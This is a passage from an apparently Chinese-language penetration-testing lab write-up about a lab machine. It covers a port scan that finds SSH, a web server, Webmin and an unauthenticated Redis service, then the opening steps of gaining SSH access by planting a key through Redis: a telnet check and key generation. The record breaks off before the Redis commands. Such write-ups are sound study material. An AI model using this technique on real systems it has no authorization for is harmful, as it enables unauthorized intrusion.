1 扫描
22想到可能会有ssh登录,
80进web搜集信息,包括用dirbuster扫目录,但是没找到什么有价值的。
10000是webmin是远程管理系统。也没账号密码。
6379是redis服务,网上也有很多科普这里。
理论上这应该是个在受信任内部环境运行的数据库工具,不应对外开放,既然对外了,可能这就是个利用突破口,可能连密码认证都没要。可以安装用这个工具利用apt install redis-tools
Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
Discovered open port 10000/udp on 10.10.10.160
Discovered open port 22/tcp on 10.10.10.160
Nmap scan report for 10.10.10.160
Host is up (0.25s latency).
PORT STATE SERVICE
6379/tcp open redis
2 redis利用
网上找到这个。跟着这个步骤来redis
首先确认没有密码认证,可以直接进入,然后做ssh-key,存进去,就可以直接登录ssh了。
当然,目录有所不同,要稍微调整下。密码我都没有设直接按回车
C:\root> telnet 10.10.10.160 6379
Trying 10.10.10.160...
Connected to 10.10.10.160.
Escape character is '^]'.
echo "hey"
$3
hey
quit
+OK
Connection closed by foreign host.
C:\root> ssh-keygen -t rsa -C "crack@redis.io"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:wYLTy+zxSCYXHb47wx1yjRVTmx+pPfJO+9gkRTrUlS8 crack@redis.io
The key's randomart image is:
+---[RSA 3072]